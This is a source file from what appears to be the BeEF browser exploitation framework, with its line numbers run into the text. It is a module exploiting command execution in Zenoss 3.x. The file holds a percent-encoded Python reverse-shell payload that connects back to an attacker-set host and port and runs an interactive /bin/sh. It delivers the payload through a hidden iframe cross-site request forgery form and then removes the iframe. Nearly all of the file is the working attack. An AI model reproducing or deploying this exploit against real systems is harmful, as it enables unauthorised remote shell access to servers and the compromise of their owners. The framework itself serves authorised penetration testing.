Path: blob/master/modules/exploits/zenoss_3x_command_execution/command.js
1154 views
//1// Copyright (c) 2006-2025 Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {7var rhost = '<%= @rhost %>';8var rport = '<%= @rport %>';9var lhost = '<%= @lhost %>';10var lport = '<%= @lport %>';11var user = '<%= @user %>';12var pass = '<%= @pass %>';13var target = 'http://'+rhost+':'+rport+'/zport/About/showDaemonXMLConfig'1415// reverse python payload16var payload = unescape('%70%79%74%68%6f%6e%20%2d%63%20%22%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%68%6f%73%74%3d%5c%22'+lhost+'%5c%22%3b%70%6f%72%74%3d'+lport+'%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%68%6f%73%74%2c%70%6f%72%74%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%5c%22%2f%62%69%6e%2f%73%68%5c%22%2c%5c%22%2d%69%5c%22%5d%29%3b%22')1718// send request19var zenoss_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "POST", "application/x-www-form-urlencoded", [20{'type':'hidden', 'name':'__ac_name', 'value':user},21{'type':'hidden', 'name':'__ac_password', 'value':pass},22{'type':'hidden', 'name':'daemon', 'value':payload}23]);24beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");2526// clean up27cleanup = function() {28document.body.removeChild(zenoss_iframe_<%= @command_id %>);29}30setTimeout("cleanup()", 15000);3132});33343536